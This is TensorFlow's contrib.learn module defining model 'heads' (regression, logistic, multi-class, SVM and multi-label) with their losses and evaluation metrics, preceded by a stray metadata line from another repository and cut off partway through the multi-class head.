#matplotlib.rcParams.update({'legend.frameon': False}) | anaandresarroyo/Python-GarminDataAnalyser | MatplotlibSettings.py | Python | mit | 893 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Abstractions for the head(s) of a model.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
from tensorflow.contrib import framework as framework_lib
from tensorflow.contrib import layers as layers_lib
from tensorflow.contrib import lookup as lookup_lib
# TODO(ptucker): Use tf.losses and tf.metrics.
from tensorflow.contrib import losses as losses_lib
from tensorflow.contrib import metrics as metrics_lib
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.estimators.metric_key import MetricKey as mkey
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import weights_broadcast_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import training
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
class Head(object):
"""Interface for the head/top of a model.
Given logits (or output of a hidden layer), a Head knows how to compute
predictions, loss, default metric and export signature. It is meant to,
1) Simplify writing model_fn and to make model_fn more configurable
2) Support wide range of machine learning models. Since most heads can work
with logits, they can support DNN, RNN, Wide, Wide&Deep,
Global objectives, Gradient boosted trees and many other types
of machine learning models.
2) To allow users to seamlessly switch between 1 to n heads for multi
objective learning (See _MultiHead implementation for more details)
Common usage:
Here is simplified model_fn to build a multiclass DNN model.
```python
def _my_dnn_model_fn(features, labels, mode, params, config=None):
# Optionally your callers can pass head to model_fn as a param.
head = tf.contrib.learn.multi_class_head(...)
input = tf.contrib.layers.input_from_feature_columns(features, ...)
last_hidden_layer_out = tf.contrib.layers.stack(
input, tf.contrib.layers.fully_connected, [1000, 500])
logits = tf.contrib.layers.fully_connected(
last_hidden_layer_out, head.logits_dimension, activation_fn=None)
def _train_op_fn(loss):
return optimizer.minimize(loss)
return head.create_model_fn_ops(
features=features,
labels=labels,
mode=mode,
train_op_fn=_train_op_fn,
logits=logits,
scope=...)
```
Most heads also support logits_input which is typically the output of the last
hidden layer. Some heads (like heads responsible for candidate sampling or
hierarchical softmax) intrinsically will not support logits and you have
to pass logits_input. Here is a common usage,
```python
return head.create_model_fn_ops(
features=features,
labels=labels,
mode=mode,
train_op_fn=_train_op_fn,
logits_input=last_hidden_layer_out,
scope=...)
```python
There are cases where computing and applying gradients can not be meaningfully
captured with train_op_fn we support (for example, with sync optimizer). In
such case, you can take the responsibility on your own. Here is a common
use case,
```python
model_fn_ops = head.create_model_fn_ops(
features=features,
labels=labels,
mode=mode,
train_op_fn=tf.contrib.learn.no_op_train_fn,
logits=logits,
scope=...)
if mode == tf.contrib.learn.ModeKeys.TRAIN:
optimizer = ...
sync = tf.train.SyncReplicasOptimizer(opt=optimizer, ...)
update_op = tf.contrib.layers.optimize_loss(optimizer=sync,
loss=model_fn_ops.loss, ...)
hooks = [sync.make_session_run_hook(is_chief)]
... upate train_op and hooks in ModelFnOps and return
```
"""
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def logits_dimension(self):
"""Size of the last dimension of the logits `Tensor`.
Typically, logits is of shape `[batch_size, logits_dimension]`.
Returns:
The expected size of the `logits` tensor.
"""
raise NotImplementedError("Calling an abstract method.")
@abc.abstractmethod
def create_model_fn_ops(self,
features,
mode,
labels=None,
train_op_fn=None,
logits=None,
logits_input=None,
scope=None):
"""Returns `ModelFnOps` that a model_fn can return.
Please note that,
+ Exactly one of `logits` and `logits_input` must be provided.
+ All args must be passed via name.
Args:
features: Input `dict` of `Tensor` objects.
mode: Estimator's `ModeKeys`.
labels: Labels `Tensor`, or `dict` of same.
train_op_fn: Function that takes a scalar loss `Tensor` and returns an op
to optimize the model with the loss. This is used in TRAIN mode and
must not be None. None is allowed in other modes. If you want to
optimize loss yourself you can pass `no_op_train_fn` and then use
ModeFnOps.loss to compute and apply gradients.
logits: logits `Tensor` to be used by the head.
logits_input: `Tensor` from which to build logits, often needed when you
don't want to compute the logits. Typicaly this is the activation of the
last hidden layer in a DNN. Some heads (like the ones responsible for
candidate sampling) intrinsically avoid computing full logits and only
accepts logits_input.
scope: Optional scope for `variable_scope`.
Returns:
An instance of `ModelFnOps`.
Raises:
ValueError: If `mode` is not recognized.
ValueError: If neither or both of `logits` and `logits_input` is provided.
"""
raise NotImplementedError("Calling an abstract method.")
def regression_head(label_name=None,
weight_column_name=None,
label_dimension=1,
enable_centered_bias=False,
head_name=None):
"""Creates a `Head` for linear regression.
Args:
label_name: String, name of the key in label dict. Can be null if label
is a tensor (single headed models).
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
label_dimension: Number of regression labels per example. This is the size
of the last dimension of the labels `Tensor` (typically, this has shape
`[batch_size, label_dimension]`).
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
head_name: name of the head. If provided, predictions, summary and metrics
keys will be suffixed by `"/" + head_name` and the default variable scope
will be `head_name`.
Returns:
An instance of `Head` for linear regression.
"""
return _RegressionHead(
label_name=label_name,
weight_column_name=weight_column_name,
label_dimension=label_dimension,
enable_centered_bias=enable_centered_bias,
head_name=head_name,
loss_fn=_mean_squared_loss,
link_fn=array_ops.identity)
def poisson_regression_head(label_name=None,
weight_column_name=None,
label_dimension=1,
enable_centered_bias=False,
head_name=None):
"""Creates a `Head` for poisson regression.
Args:
label_name: String, name of the key in label dict. Can be null if label
is a tensor (single headed models).
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
label_dimension: Number of regression labels per example. This is the size
of the last dimension of the labels `Tensor` (typically, this has shape
`[batch_size, label_dimension]`).
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
head_name: name of the head. If provided, predictions, summary and metrics
keys will be suffixed by `"/" + head_name` and the default variable scope
will be `head_name`.
Returns:
An instance of `Head` for poisson regression.
"""
return _RegressionHead(
label_name=label_name,
weight_column_name=weight_column_name,
label_dimension=label_dimension,
enable_centered_bias=enable_centered_bias,
head_name=head_name,
loss_fn=_poisson_loss,
link_fn=math_ops.exp)
# TODO(zakaria): Consider adding a _RegressionHead for logistic_regression
def multi_class_head(n_classes,
label_name=None,
weight_column_name=None,
enable_centered_bias=False,
head_name=None,
thresholds=None,
metric_class_ids=None,
loss_fn=None,
label_keys=None):
"""Creates a `Head` for multi class single label classification.
The Head uses softmax cross entropy loss.
This head expects to be fed integer labels specifying the class index. But
if `label_keys` is specified, then labels must be strings from this
vocabulary, and the predicted classes will be strings from the same
vocabulary.
Args:
n_classes: Integer, number of classes, must be >= 2
label_name: String, name of the key in label dict. Can be null if label
is a tensor (single headed models).
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
head_name: name of the head. If provided, predictions, summary and metrics
keys will be suffixed by `"/" + head_name` and the default variable scope
will be `head_name`.
thresholds: thresholds for eval metrics, defaults to [.5]
metric_class_ids: List of class IDs for which we should report per-class
metrics. Must all be in the range `[0, n_classes)`. Invalid if
`n_classes` is 2.
loss_fn: Optional function that takes (`labels`, `logits`, `weights`) as
parameter and returns a weighted scalar loss. `weights` should be
optional. See `tf.losses`
label_keys: Optional list of strings with size `[n_classes]` defining the
label vocabulary. Only supported for `n_classes` > 2.
Returns:
An instance of `Head` for multi class classification.
Raises:
ValueError: if `n_classes` is < 2.
ValueError: If `metric_class_ids` is provided when `n_classes` is 2.
ValueError: If `len(label_keys) != n_classes`.
"""
if (n_classes is None) or (n_classes < 2):
raise ValueError("n_classes must be > 1 for classification: %s." %
n_classes)
if loss_fn:
_verify_loss_fn_args(loss_fn)
loss_fn = _wrap_custom_loss_fn(loss_fn) if loss_fn else None
if n_classes == 2:
if metric_class_ids:
raise ValueError("metric_class_ids invalid for n_classes==2.")
if label_keys:
raise ValueError("label_keys is not supported for n_classes=2.")
return _BinaryLogisticHead(
label_name=label_name,
weight_column_name=weight_column_name,
enable_centered_bias=enable_centered_bias,
head_name=head_name,
thresholds=thresholds,
loss_fn=loss_fn)
return _MultiClassHead(
n_classes=n_classes,
label_name=label_name,
weight_column_name=weight_column_name,
enable_centered_bias=enable_centered_bias,
head_name=head_name,
thresholds=thresholds,
metric_class_ids=metric_class_ids,
loss_fn=loss_fn,
label_keys=label_keys)
def binary_svm_head(
label_name=None,
weight_column_name=None,
enable_centered_bias=False,
head_name=None,
thresholds=None,):
"""Creates a `Head` for binary classification with SVMs.
The head uses binary hinge loss.
Args:
label_name: String, name of the key in label dict. Can be null if label
is a tensor (single headed models).
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
head_name: name of the head. If provided, predictions, summary and metrics
keys will be suffixed by `"/" + head_name` and the default variable scope
will be `head_name`.
thresholds: thresholds for eval metrics, defaults to [.5]
Returns:
An instance of `Head` for binary classification with SVM.
"""
return _BinarySvmHead(
label_name=label_name,
weight_column_name=weight_column_name,
enable_centered_bias=enable_centered_bias,
head_name=head_name,
thresholds=thresholds)
def multi_label_head(n_classes,
label_name=None,
weight_column_name=None,
enable_centered_bias=False,
head_name=None,
thresholds=None,
metric_class_ids=None,
loss_fn=None):
"""Creates a Head for multi label classification.
The Head uses sigmoid cross entropy loss.
Args:
n_classes: Integer, number of classes, must be >= 2
label_name: String, name of the key in label dict. Can be null if label
is a tensor (single headed models).
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
head_name: name of the head. If provided, predictions, summary and metrics
keys will be suffixed by `"/" + head_name` and the default variable scope
will be `head_name`.
thresholds: thresholds for eval metrics, defaults to [.5]
metric_class_ids: List of class IDs for which we should report per-class
metrics. Must all be in the range `[0, n_classes)`.
loss_fn: Optional function that takes (`labels`, `logits`, `weights`) as
parameter and returns a weighted scalar loss. `weights` should be
optional. See `tf.losses`
Returns:
An instance of `Head` for multi label classification.
Raises:
ValueError: If n_classes is < 2
ValueError: If loss_fn does not have expected signature.
"""
if n_classes < 2:
raise ValueError("n_classes must be > 1 for classification.")
if loss_fn:
_verify_loss_fn_args(loss_fn)
return _MultiLabelHead(
n_classes=n_classes,
label_name=label_name,
weight_column_name=weight_column_name,
enable_centered_bias=enable_centered_bias,
head_name=head_name,
thresholds=thresholds,
metric_class_ids=metric_class_ids,
loss_fn=_wrap_custom_loss_fn(loss_fn) if loss_fn else None)
def multi_head(heads, loss_weights=None):
"""Creates a MultiHead stemming from same logits/hidden layer.
Args:
heads: list of Head objects.
loss_weights: optional list of weights to be used to merge losses from
each head. All losses are weighted equally if not provided.
Returns:
A instance of `Head` that merges multiple heads.
Raises:
ValueError: if heads and loss_weights have different size.
"""
if loss_weights:
if len(loss_weights) != len(heads):
raise ValueError("heads and loss_weights must have same size")
def _weighted_loss_merger(losses):
if loss_weights:
if len(losses) != len(loss_weights):
raise ValueError("losses and loss_weights must have same size")
weighted_losses = []
for loss, weight in zip(losses, loss_weights):
weighted_losses.append(math_ops.multiply(loss, weight))
return math_ops.add_n(weighted_losses)
else:
return math_ops.add_n(losses)
return _MultiHead(heads, loss_merger=_weighted_loss_merger)
def no_op_train_fn(loss):
del loss
return control_flow_ops.no_op()
class _SingleHead(Head):
"""Interface for a single head/top of a model."""
__metaclass__ = abc.ABCMeta
def __init__(
self, problem_type, logits_dimension, label_name=None,
weight_column_name=None, head_name=None):
if problem_type is None:
raise ValueError("Invalid problem_type %s." % problem_type)
if logits_dimension is None or logits_dimension < 1:
raise ValueError("Invalid logits_dimension %s." % logits_dimension)
self._problem_type = problem_type
self._logits_dimension = logits_dimension
self._label_name = label_name
self._weight_column_name = weight_column_name
self._head_name = head_name
@property
def logits_dimension(self):
return self._logits_dimension
@property
def label_name(self):
return self._label_name
@property
def weight_column_name(self):
return self._weight_column_name
@property
def head_name(self):
return self._head_name
def _create_output_alternatives(self, predictions):
"""Creates output alternative for the Head.
Args:
predictions: a dict of {tensor_name: Tensor}, where 'tensor_name' is a
symbolic name for an output Tensor possibly but not necessarily taken
from `PredictionKey`, and 'Tensor' is the corresponding output Tensor
itself.
Returns:
`dict` of {submodel_name: (problem_type, {tensor_name: Tensor})}, where
'submodel_name' is a submodel identifier that should be consistent across
the pipeline (here likely taken from the head_name),
'problem_type' is a `ProblemType`,
'tensor_name' is a symbolic name for an output Tensor possibly but not
necessarily taken from `PredictionKey`, and
'Tensor' is the corresponding output Tensor itself.
"""
return {self._head_name: (self._problem_type, predictions)}
# TODO(zakaria): use contrib losses.
def _mean_squared_loss(labels, logits, weights=None):
with ops.name_scope(None, "mean_squared_loss", (logits, labels)) as name:
logits = ops.convert_to_tensor(logits)
labels = ops.convert_to_tensor(labels)
# To prevent broadcasting inside "-".
if len(labels.get_shape()) == 1:
labels = array_ops.expand_dims(labels, dim=(1,))
# TODO(zakaria): make sure it does not recreate the broadcast bug.
if len(logits.get_shape()) == 1:
logits = array_ops.expand_dims(logits, dim=(1,))
logits.get_shape().assert_is_compatible_with(labels.get_shape())
loss = math_ops.square(logits - math_ops.to_float(labels), name=name)
return _compute_weighted_loss(loss, weights)
def _poisson_loss(labels, logits, weights=None):
"""Computes poisson loss from logits."""
with ops.name_scope(None, "_poisson_loss", (logits, labels)) as name:
logits = ops.convert_to_tensor(logits)
labels = ops.convert_to_tensor(labels)
# To prevent broadcasting inside "-".
if len(labels.get_shape()) == 1:
labels = array_ops.expand_dims(labels, dim=(1,))
# TODO(zakaria): make sure it does not recreate the broadcast bug.
if len(logits.get_shape()) == 1:
logits = array_ops.expand_dims(logits, dim=(1,))
logits.get_shape().assert_is_compatible_with(labels.get_shape())
loss = nn.log_poisson_loss(labels, logits, compute_full_loss=True,
name=name)
return _compute_weighted_loss(loss, weights)
def _logits(logits_input, logits, logits_dimension):
"""Validate logits args, and create `logits` if necessary.
Exactly one of `logits_input` and `logits` must be provided.
Args:
logits_input: `Tensor` input to `logits`.
logits: `Tensor` output.
logits_dimension: Integer, last dimension of `logits`. This is used to
create `logits` from `logits_input` if `logits` is `None`; otherwise, it's
used to validate `logits`.
Returns:
`logits` `Tensor`.
Raises:
ValueError: if neither or both of `logits` and `logits_input` are supplied.
"""
if (logits_dimension is None) or (logits_dimension < 1):
raise ValueError("Invalid logits_dimension %s." % logits_dimension)
# If not provided, create logits.
if logits is None:
if logits_input is None:
raise ValueError("Neither logits nor logits_input supplied.")
return layers_lib.linear(logits_input, logits_dimension, scope="logits")
if logits_input is not None:
raise ValueError("Both logits and logits_input supplied.")
logits = ops.convert_to_tensor(logits, name="logits")
logits_dims = logits.get_shape().dims
if logits_dims is not None:
logits_dims[-1].assert_is_compatible_with(logits_dimension)
return logits
def _create_model_fn_ops(features,
mode,
loss_fn,
logits_to_predictions_fn,
metrics_fn,
create_output_alternatives_fn,
labels=None,
train_op_fn=None,
logits=None,
logits_dimension=None,
head_name=None,
weight_column_name=None,
enable_centered_bias=False):
"""Returns a `ModelFnOps` object."""
_check_mode_valid(mode)
centered_bias = None
if enable_centered_bias:
centered_bias = _centered_bias(logits_dimension, head_name)
logits = nn.bias_add(logits, centered_bias)
predictions = logits_to_predictions_fn(logits)
loss = None
train_op = None
eval_metric_ops = None
if (mode != model_fn.ModeKeys.INFER) and (labels is not None):
weight_tensor = _weight_tensor(features, weight_column_name)
loss, weighted_average_loss = loss_fn(labels, logits, weight_tensor)
# Uses the deprecated API to set the tag explicitly.
# Without it, trianing and eval losses will show up in different graphs.
logging_ops.scalar_summary(
_summary_key(head_name, mkey.LOSS), weighted_average_loss)
if mode == model_fn.ModeKeys.TRAIN:
if train_op_fn is None:
raise ValueError("train_op_fn can not be None in TRAIN mode")
batch_size = array_ops.shape(logits)[0]
train_op = _train_op(loss, labels, train_op_fn, centered_bias,
batch_size, loss_fn, weight_tensor)
eval_metric_ops = metrics_fn(
weighted_average_loss, predictions, labels, weight_tensor)
return model_fn.ModelFnOps(
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metric_ops=eval_metric_ops,
output_alternatives=create_output_alternatives_fn(predictions))
class _RegressionHead(_SingleHead):
"""`Head` for regression with a generalized linear model."""
def __init__(self,
label_dimension,
loss_fn,
link_fn,
label_name=None,
weight_column_name=None,
enable_centered_bias=False,
head_name=None):
"""`Head` for regression.
Args:
label_dimension: Number of regression labels per example. This is the
size of the last dimension of the labels `Tensor` (typically, this has
shape `[batch_size, label_dimension]`).
loss_fn: Loss function, takes logits and labels and returns loss.
link_fn: Link function, takes a logits tensor and returns the output.
label_name: String, name of the key in label dict. Can be null if label
is a tensor (single headed models).
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
head_name: name of the head. Predictions, summary and metrics keys are
suffixed by `"/" + head_name` and the default variable scope is
`head_name`.
"""
super(_RegressionHead, self).__init__(
problem_type=constants.ProblemType.LINEAR_REGRESSION,
logits_dimension=label_dimension,
label_name=label_name,
weight_column_name=weight_column_name,
head_name=head_name)
self._loss_fn = loss_fn
self._link_fn = link_fn
self._enable_centered_bias = enable_centered_bias
def create_model_fn_ops(self,
features,
mode,
labels=None,
train_op_fn=None,
logits=None,
logits_input=None,
scope=None):
"""See `Head`."""
with variable_scope.variable_scope(
scope,
default_name=self.head_name or "regression_head",
values=(tuple(six.itervalues(features)) +
(labels, logits, logits_input))):
labels = self._transform_labels(mode=mode, labels=labels)
logits = _logits(logits_input, logits, self.logits_dimension)
return _create_model_fn_ops(
features=features,
mode=mode,
loss_fn=self._loss_fn,
logits_to_predictions_fn=self._logits_to_predictions,
metrics_fn=self._metrics,
create_output_alternatives_fn=self._create_output_alternatives,
labels=labels,
train_op_fn=train_op_fn,
logits=logits,
logits_dimension=self.logits_dimension,
head_name=self.head_name,
weight_column_name=self.weight_column_name,
enable_centered_bias=self._enable_centered_bias)
def _transform_labels(self, mode, labels):
"""Applies transformations to labels tensor."""
if (mode == model_fn.ModeKeys.INFER) or (labels is None):
return None
labels_tensor = _to_labels_tensor(labels, self._label_name)
_check_no_sparse_tensor(labels_tensor)
return labels_tensor
def _logits_to_predictions(self, logits):
"""Returns a dict of predictions.
Args:
logits: logits `Tensor` after applying possible centered bias.
Returns:
Dict of prediction `Tensor` keyed by `PredictionKey`.
"""
key = prediction_key.PredictionKey.SCORES
with ops.name_scope(None, "predictions", (logits,)):
if self.logits_dimension == 1:
logits = array_ops.squeeze(logits, squeeze_dims=(1,), name=key)
return {key: self._link_fn(logits)}
def _metrics(self, eval_loss, predictions, labels, weights):
"""Returns a dict of metrics keyed by name."""
del predictions, labels, weights # Unused by this head.
with ops.name_scope("metrics", values=[eval_loss]):
return {
_summary_key(self.head_name, mkey.LOSS):
metrics_lib.streaming_mean(eval_loss)}
def _log_loss_with_two_classes(labels, logits, weights=None):
with ops.name_scope(None, "log_loss_with_two_classes",
(logits, labels)) as name:
logits = ops.convert_to_tensor(logits)
labels = math_ops.to_float(labels)
# TODO(ptucker): This will break for dynamic shapes.
# sigmoid_cross_entropy_with_logits requires [batch_size, 1] labels.
if len(labels.get_shape()) == 1:
labels = array_ops.expand_dims(labels, dim=(1,))
loss = nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits,
name=name)
return _compute_weighted_loss(loss, weights)
def _one_class_to_two_class_logits(logits):
return array_ops.concat((array_ops.zeros_like(logits), logits), 1)
class _BinaryLogisticHead(_SingleHead):
"""`Head` for binary classification with logistic regression."""
def __init__(self,
label_name=None,
weight_column_name=None,
enable_centered_bias=False,
head_name=None,
loss_fn=None,
thresholds=None):
"""`Head` for binary classification with logistic regression.
Args:
label_name: String, name of the key in label dict. Can be `None` if label
is a tensor (single headed models).
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
head_name: name of the head. Predictions, summary, metrics keys are
suffixed by `"/" + head_name` and the default variable scope is
`head_name`.
loss_fn: Loss function.
thresholds: thresholds for eval.
Raises:
ValueError: if n_classes is invalid.
"""
super(_BinaryLogisticHead, self).__init__(
problem_type=constants.ProblemType.LOGISTIC_REGRESSION,
logits_dimension=1,
label_name=label_name,
weight_column_name=weight_column_name,
head_name=head_name)
self._thresholds = thresholds if thresholds else (.5,)
self._loss_fn = loss_fn if loss_fn else _log_loss_with_two_classes
self._enable_centered_bias = enable_centered_bias
def create_model_fn_ops(self,
features,
mode,
labels=None,
train_op_fn=None,
logits=None,
logits_input=None,
scope=None):
"""See `Head`."""
with variable_scope.variable_scope(
scope,
default_name=self.head_name or "binary_logistic_head",
values=(tuple(six.itervalues(features)) +
(labels, logits, logits_input))):
labels = self._transform_labels(mode=mode, labels=labels)
logits = _logits(logits_input, logits, self.logits_dimension)
return _create_model_fn_ops(
features=features,
mode=mode,
loss_fn=self._loss_fn,
logits_to_predictions_fn=self._logits_to_predictions,
metrics_fn=self._metrics,
create_output_alternatives_fn=_classification_output_alternatives(
self.head_name, self._problem_type),
labels=labels,
train_op_fn=train_op_fn,
logits=logits,
logits_dimension=self.logits_dimension,
head_name=self.head_name,
weight_column_name=self.weight_column_name,
enable_centered_bias=self._enable_centered_bias)
def _transform_labels(self, mode, labels):
"""Applies transformations to labels tensor."""
if (mode == model_fn.ModeKeys.INFER) or (labels is None):
return None
labels_tensor = _to_labels_tensor(labels, self._label_name)
_check_no_sparse_tensor(labels_tensor)
return labels_tensor
def _logits_to_predictions(self, logits):
"""Returns a dict of predictions.
Args:
logits: logits `Output` after applying possible centered bias.
Returns:
Dict of prediction `Output` keyed by `PredictionKey`.
"""
with ops.name_scope(None, "predictions", (logits,)):
two_class_logits = _one_class_to_two_class_logits(logits)
return {
prediction_key.PredictionKey.LOGITS:
logits,
prediction_key.PredictionKey.LOGISTIC:
math_ops.sigmoid(
logits, name=prediction_key.PredictionKey.LOGISTIC),
prediction_key.PredictionKey.PROBABILITIES:
nn.softmax(
two_class_logits,
name=prediction_key.PredictionKey.PROBABILITIES),
prediction_key.PredictionKey.CLASSES:
math_ops.argmax(
two_class_logits,
1,
name=prediction_key.PredictionKey.CLASSES)
}
def _metrics(self, eval_loss, predictions, labels, weights):
"""Returns a dict of metrics keyed by name."""
with ops.name_scope("metrics", values=(
[eval_loss, labels, weights] + list(six.itervalues(predictions)))):
classes = predictions[prediction_key.PredictionKey.CLASSES]
logistic = predictions[prediction_key.PredictionKey.LOGISTIC]
metrics = {_summary_key(self.head_name, mkey.LOSS):
metrics_lib.streaming_mean(eval_loss)}
# TODO(b/29366811): This currently results in both an "accuracy" and an
# "accuracy/threshold_0.500000_mean" metric for binary classification.
metrics[_summary_key(self.head_name, mkey.ACCURACY)] = (
metrics_lib.streaming_accuracy(classes, labels, weights))
metrics[_summary_key(self.head_name, mkey.PREDICTION_MEAN)] = (
_predictions_streaming_mean(logistic, weights))
metrics[_summary_key(self.head_name, mkey.LABEL_MEAN)] = (
_indicator_labels_streaming_mean(labels, weights))
# Also include the streaming mean of the label as an accuracy baseline, as
# a reminder to users.
metrics[_summary_key(self.head_name, mkey.ACCURACY_BASELINE)] = (
_indicator_labels_streaming_mean(labels, weights))
metrics[_summary_key(self.head_name, mkey.AUC)] = (
_streaming_auc(logistic, labels, weights))
metrics[_summary_key(self.head_name, mkey.AUC_PR)] = (
_streaming_auc(logistic, labels, weights, curve="PR"))
for threshold in self._thresholds:
metrics[_summary_key(
self.head_name, mkey.ACCURACY_MEAN % threshold)] = (
_streaming_accuracy_at_threshold(logistic, labels, weights,
threshold))
# Precision for positive examples.
metrics[_summary_key(
self.head_name, mkey.PRECISION_MEAN % threshold)] = (
_streaming_precision_at_threshold(logistic, labels, weights,
threshold))
# Recall for positive examples.
metrics[_summary_key(
self.head_name, mkey.RECALL_MEAN % threshold)] = (
_streaming_recall_at_threshold(logistic, labels, weights,
threshold))
return metrics
def _softmax_cross_entropy_loss(labels, logits, weights=None):
with ops.name_scope(
None, "softmax_cross_entropy_loss", (logits, labels,)) as name:
labels = ops.convert_to_tensor(labels)
# Check that we got integer for classification.
if not labels.dtype.is_integer:
raise ValueError("Labels dtype should be integer "
"Instead got %s." % labels.dtype)
# sparse_softmax_cross_entropy_with_logits requires [batch_size] labels.
is_squeezed_labels = False
# TODO(ptucker): This will break for dynamic shapes.
if len(labels.get_shape()) == 2:
labels = array_ops.squeeze(labels, squeeze_dims=(1,))
is_squeezed_labels = True
loss = nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits, name=name)
# Restore squeezed dimension, if necessary, so loss matches weights shape.
if is_squeezed_labels:
loss = array_ops.expand_dims(loss, axis=(1,))
return _compute_weighted_loss(loss, weights)
class _MultiClassHead(_SingleHead):
"""'Head' for multi class classification."""
def __init__(self,
n_classes,
label_name=None,
weight_column_name=None,
enable_centered_bias=False,
head_name=None,
loss_fn=None,
thresholds=None,
metric_class_ids=None,
label_keys=None):
"""'Head' for multi class classification.
This head expects to be fed integer labels specifying the class index. But
if `label_keys` is specified, then labels must be strings from this
vocabulary, and the predicted classes will be strings from the same
vocabulary.
Args:
n_classes: Number of classes, must be greater than 2 (for 2 classes, use
`_BinaryLogisticHead`).
label_name: String, name of the key in label dict. Can be null if label
is a tensor (single headed models).
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
head_name: name of the head. If provided, predictions, summary, metrics
keys will be suffixed by `"/" + head_name` and the default variable
scope will be `head_name`.
loss_fn: Loss function. Defaults to softmax cross entropy loss.
thresholds: thresholds for eval.
metric_class_ids: List of class IDs for which we should report per-class
metrics. Must all be in the range `[0, n_classes)`.
label_keys: Optional list of strings with size `[n_classes]` defining the
label vocabulary.
Raises:
ValueError: if `n_classes`, `metric_class_ids` or `label_keys` is invalid.
"""
super(_MultiClassHead, self).__init__(
problem_type=constants.ProblemType.CLASSIFICATION,
logits_dimension=n_classes,
label_name=label_name,
weight_column_name=weight_column_name,
head_name=head_name)
if (n_classes is None) or (n_classes <= 2):
raise ValueError("n_classes must be > 2: %s." % n_classes)
self._thresholds = thresholds if thresholds else (.5,)
self._loss_fn = loss_fn if loss_fn else _softmax_cross_entropy_loss
self._enable_centered_bias = enable_centered_bias
self._metric_class_ids = tuple([] if metric_class_ids is None else
metric_class_ids)
for class_id in self._metric_class_ids:
if (class_id < 0) or (class_id >= n_classes):
raise ValueError("Class ID %s not in [0, %s)." % (class_id, n_classes))
if label_keys and len(label_keys) != n_classes:
raise ValueError("Length of label_keys must equal n_classes.")
self._label_keys = label_keys
def create_model_fn_ops(self,
features,
mode,
labels=None,
train_op_fn=None,
logits=None,
logits_input=None,
scope=None):
"""See `Head`."""
with variable_scope.variable_scope(
scope,
default_name=self.head_name or "multi_class_head",
values=(tuple(six.itervalues(features)) +
(labels, logits, logits_input))):
labels = self._transform_labels(mode=mode, labels=labels)
logits = _logits(logits_input, logits, self.logits_dimension)
return _create_model_fn_ops(
features=features,
mode=mode,
loss_fn=self._wrapped_loss_fn,
logits_to_predictions_fn=self._logits_to_predictions,
metrics_fn=self._metrics,
create_output_alternatives_fn=_classification_output_alternatives(
self.head_name, self._problem_type, self._label_keys),
labels=labels,
train_op_fn=train_op_fn,
logits=logits,
logits_dimension=self.logits_dimension,
head_name=self.head_name,
weight_column_name=self.weight_column_name,
enable_centered_bias=self._enable_centered_bias)
def _transform_labels(self, mode, labels):
"""Returns a dict that contains both the original labels and label IDs."""
if (mode == model_fn.ModeKeys.INFER) or (labels is None):
return None
labels_tensor = _to_labels_tensor(labels, self._label_name)
_check_no_sparse_tensor(labels_tensor)
if self._label_keys:
table = lookup_lib.string_to_index_table_from_tensor(
mapping=self._label_keys,
name="label_id_lookup")
return {
"labels": labels_tensor,
"label_ids": table.lookup(labels_tensor),
}
return {
"labels": labels_tensor,
"label_ids": labels_tensor,
}
def _labels(self, labels_dict):
"""Returns labels `Tensor` of the same type as classes."""
return labels_dict["labels"]
def _label_ids(self, labels_dict):
"""Returns integer label ID `Tensor`."""
return labels_dict["label_ids"]
def _wrapped_loss_fn(self, labels, logits, weights=None):
return self._loss_fn(self._label_ids(labels), logits, weights=weights)
def _logits_to_predictions(self, logits):
"""Returns a dict of predictions.
Args:
logits: logits `Tensor` after applying possible centered bias.
Returns:
